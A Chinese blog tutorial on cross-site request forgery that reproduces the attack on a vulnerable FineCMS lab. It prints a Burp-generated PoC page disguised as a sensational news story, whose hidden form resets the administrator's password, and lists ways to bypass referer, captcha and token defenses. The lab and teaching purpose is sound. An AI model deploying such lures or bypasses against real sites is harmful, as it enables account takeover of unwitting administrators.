Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >CSRF跨站请求伪造——原理及复现

CSRF跨站请求伪造——原理及复现

原创
作者头像
行云博客
修改于 2020-08-13 02:13:21
修改于 2020-08-13 02:13:21
2.4K0
举报
文章被收录于专栏:行云博客行云博客

转自行云博客https://www.xy586.top/

原理

CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性

你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。 CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账......造成的问题包括: 个人隐私泄露以及财产安全。

过程

csrf过程
csrf过程

复现

靶场

某finecms,该源码存在xss以及csrf漏洞

下载地址finecms

安装教程文件里有,这里不再说明

步骤

代码审计加抓包发现构造点

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

利用burp自带功能,生成csrf的payload

在这里插入图片描述
在这里插入图片描述

本地保存下来并访问

代码语言:txt
AI代码解释
复制
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <title>震惊!!! 某网吧机子竟集体瘫痪</title>
  <link rel="icon" href="https://www.bilibili.com/favicon.ico">
  <body>
    <style type="text/css">

        #sub{
            font-size: 20px;
            display: block;
            height: 58px;
            width: 150px;
            margin: 30px auto 0;
            line-height: 38px;
            vertical-align: middle;
            text-align: center;
            font-size: 16px;
            background: #00a1d6;
            color: #fff;
            border-radius: 10px;
            transition: 0.2s;
        }
        .title {
            text-align: center;
        }
        p{
            font-size: 50px;
        }
        span{
            font-size: 18px;
        }
      

          </style>
  <script>history.pushState('', '', '/')</script>
    <div class="title">
    <h1>震惊</h1>
    <h1>男子购买网络攻击工具当黑客 致40多家网吧瘫痪!</h1>
    <h2>原因让网友无语......</h2>
    </div>

    <div>
        <p><img src="https://n.sinaimg.cn/spider202089/73/w344h529/20200809/15d4-ixkvvue4830298.png" align=left border=0>
            <img src="http://p4.itc.cn/images01/20200810/8d01f2d0c64a4c308415de0081288005.jpeg" align="right" border=0 width="344" height="529">
    <div><span>网络并非法外之地,如果因为个人在网络上的行为,致使他人遭受权益损害或者损失的话,同样会遭受到法律的惩罚。<br>
据媒体报道,近日,山东济南的一位年轻小伙王某某,因为在网络上发动网络攻击,致使40多家网吧网络瘫痪、频繁掉线。
随后,这位男子在当地被公安机关逮捕。只是这个男子的动机,着实让一众网友无语,其自称到,这样做纯粹是因为好玩,看到别人断网就兴奋。</span></div></p>
    <form action="http://finecms.com/admin.php?c=member&m=edit&uid=1" method="POST" name="hack">
      <input type="hidden" name="page" value="0" />
      <input type="hidden" name="member&#91;email&#93;" value="1&#64;qq&#46;com" />
      <input type="hidden" name="member&#91;name&#93;" value="1212" />
      <input type="hidden" name="member&#91;phone&#93;" value="12" />
      <input type="hidden" name="member&#91;password&#93;" value="123456" />
      <input type="submit" value="点击查看全文" id="sub"/>
      <img src="http://img4.myhsw.cn/2020-08-10/ACI4nKVTvKdHmM5u.jpg" align="center" height="330" width="800">
    </div>
      <script type="text/javascript">
        
        //document.hack.submit()
      </script>
    </form>
  </body>
</html>
在这里插入图片描述
在这里插入图片描述

当管理员点击查看全文时,将会自动提交表单来修改密码

代码语言:txt
AI代码解释
复制
<form action="http://finecms.com/admin.php?c=member&m=edit&uid=1" method="POST" name="hack">
      <input type="hidden" name="page" value="0" />
      <input type="hidden" name="member&#91;email&#93;" value="1&#64;qq&#46;com" />
      <input type="hidden" name="member&#91;name&#93;" value="1212" />
      <input type="hidden" name="member&#91;phone&#93;" value="12" />
      <input type="hidden" name="member&#91;password&#93;" value="123456" />
      <input type="submit" value="点击查看全文" id="sub"/><form action="http://finecms.com/admin.php?c=member&m=edit&uid=1" method="POST" name="hack">
      <input type="hidden" name="page" value="0" />
      <input type="hidden" name="member&#91;email&#93;" value="1&#64;qq&#46;com" />
      <input type="hidden" name="member&#91;name&#93;" value="1212" />
      <input type="hidden" name="member&#91;phone&#93;" value="12" />
      <input type="hidden" name="member&#91;password&#93;" value="123456" />
      <input type="submit" value="点击查看全文" id="sub"/>
在这里插入图片描述
在这里插入图片描述

此时我们已经成功修改了管理员的密码,并可以登录了

防御方式

  1. REferer头防御
  2. 验证码
  3. token
  4. 自定义请求头

绕过方式

  1. referer绕过把我们的csrf文件名改为信任的域名
  2. 看验证码是否生效第二看验证码是否多次请求都不会过期
  3. 第一找token加密规则,第二xss打token
  4. 抓包查看私有请求头,然后通过xmlhttprequest来创建请求头

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
跨站请求伪造——CSRF
csrf:需要受害者先登录网站A,然后获取受害者的 cookie,伪装成受害者;它是利用网站A本身的漏洞,去请求网站A的api。
宸寰客
2020/08/17
9320
【Pikachu】CSRF(跨站请求伪造)
1.www.xxx.com这个网站在用户修改个人的信息时没有过多的校验,导致这个请求容易被伪造; --因此,我们判断一个网站是否存在CSRF漏洞,其实就是判断其对关键信息(比如密码等敏感信息)的操作(增删改)是否容易被伪造。 2.小白点击了小黑发给的链接,并且这个时候小白刚好登录在购物网上; --如果小白安全意识高,不点击不明链接,则攻击不会成功,又或者即使小白点击了链接,但小白此时并没有登录购物网站,也不会成功。 --因此,要成功实施一次CSRF攻击,需要“天时,地利,人和”的条件。
菜菜有点菜
2022/03/17
6150
【Pikachu】CSRF(跨站请求伪造)
【网络安全】「靶场练习」(三)跨站请求伪造攻击 CSRF
理由:文章详细讲解了如何在 Swift 中使用快慢指针技巧实现这一功能,同时对算法的时间与空间复杂度进行了深入分析。从代码实现到逻辑剖析,再到测试案例解析,每个环节都清晰易懂,帮助读者全面掌握这一经典算法。
sidiot
2024/11/24
5630
跨站请求伪造(CSRF/XSRF)
简介   CSRF(Cross-site request forgery跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。 场景
逸鹏
2018/04/10
1.5K0
跨站请求伪造(CSRF/XSRF)
DVWA靶场之CSRF漏洞复现
本号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如有侵权请联系小编处理。
网络安全自修室
2022/05/16
2.7K0
DVWA靶场之CSRF漏洞复现
web漏洞 | XSS(跨站攻击脚本)详解
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击! XSS分为:存储型 、反射型 、DOM型XSS
谢公子
2022/01/13
5.1K0
web漏洞 | XSS(跨站攻击脚本)详解
跨站请求伪造—CSRF
CSRF,是跨站请求伪造(Cross Site Request Forgery)的缩写,是一种劫持受信任用户向服务器发送非预期请求的攻击方式。
FEWY
2019/11/27
1.4K0
跨站请求伪造(CSRF)攻击是什么?如何防御?
CSRF,跨站请求伪造,英文全称为 Cross-site request forgery。也可称为 XSRF。
前端西瓜哥
2022/08/18
2.2K0
CSRF(跨站请求伪造)学习总结
参考大佬的文章,附上地址 https://www.freebuf.com/articles/web/118352.html
雪痕@
2020/09/27
8180
CSRF(跨站请求伪造)学习总结
DVWA笔记(四)----CSRF
CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。
用户5878089
2019/07/25
7830
DVWA笔记(四)----CSRF
记一次CSRF的浅学习
CSRF只有简单了解,进行二次学习后总结如下,希望对正在学习CSRF的师傅有所帮助(本人只是小白,可能文章会出现问题,还请各位大师傅多多指点)
用户9691112
2023/05/18
5070
记一次CSRF的浅学习
程序猿必读-防范CSRF跨站请求伪造
CSRF(Cross-site request forgery,中文为跨站请求伪造)是一种利用网站可信用户的权限去执行未授权的命令的一种恶意攻击。通过伪装可信用户的请求来利用信任该用户的网站,这种攻击方式虽然不是很流行,但是却难以防范,其危害也不比其他安全漏洞小。
用户2131907
2019/02/27
2.7K0
PHP代码审计笔记--CSRF跨站请求伪造
  CSRF(Cross-site request forgery)跨站请求伪造。攻击者盗用了你的身份,以你的名义向第三方网站发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件,发私信,添加管理用户,甚至于交易转账等。
Bypass
2019/07/08
1.1K0
PHP代码审计笔记--CSRF跨站请求伪造
CSRF 跨站请求伪造
CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性
HammerZe
2022/03/25
1.2K0
CSRF 跨站请求伪造
跨站请求伪造(CSRF)攻击
跨站请求伪造(CSRF)攻击强迫终端用户在他们身份被认证的情况下执行对于目标应用未知的操作(恶意的)。CSRF 攻击一般针对状态更改请求,而不是数据被盗,因为攻击者无法查看对伪造请求的响应。通过社会工程的(例如通过电子邮件或聊天发送链接)方法,攻击者可以欺骗 Web 应用程序的用户执行攻击者选择的操作。如果受害者是普通用户,则成功的 CSRF 攻击可以强制用户执行状态更改请求,例如转账,更改其电子邮件地址等。如果受害者是管理帐户,CSRF 可能会危及整个 Web 应用程序。
madneal
2019/11/27
1.2K0
Web安全之CSRF实例解析
跨站请求伪造(Cross Site Request Forgery),是指黑客诱导用户打开黑客的网站,在黑客的网站中,利用用户的登陆状态发起的跨站请求。CSRF攻击就是利用了用户的登陆状态,并通过第三方的站点来做一个坏事。
前端迷
2020/07/07
1.4K0
Web安全之CSRF实例解析
CSRF跨站请求伪造
跨站请求伪造通常缩写为CSRF或者XSRF,是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本XSS相比,XSS利用的是用户对指定网站的信任,CSRF利用的是网站对用户浏览器的信任,浏览器对于同一domain下所有请求会自动携带cookie。
WindRunnerMax
2020/08/27
7700
Pikachu漏洞靶场系列之CSRF
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也被称为one click攻击。
Naraku
2021/07/29
1.9K0
Pikachu漏洞靶场系列之CSRF
保护你的网站免受黑客攻击:深入解析XSS和CSRF漏洞
👋 你好,我是 Lorin 洛林,一位 Java 后端技术开发者!座右铭:Technology has the power to make the world a better place.
Lorin 洛林
2024/04/27
6970
保护你的网站免受黑客攻击:深入解析XSS和CSRF漏洞
CSRF 原理与防御案例分析
CSRF,也称 XSRF,即跨站请求伪造攻击,与 XSS 相似,但与 XSS 相比更难防范,是一种广泛存在于网站中的安全漏洞,经常与 XSS 一起配合攻击。
信安之路
2019/04/25
2.4K0
CSRF 原理与防御案例分析
相关推荐
跨站请求伪造——CSRF
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档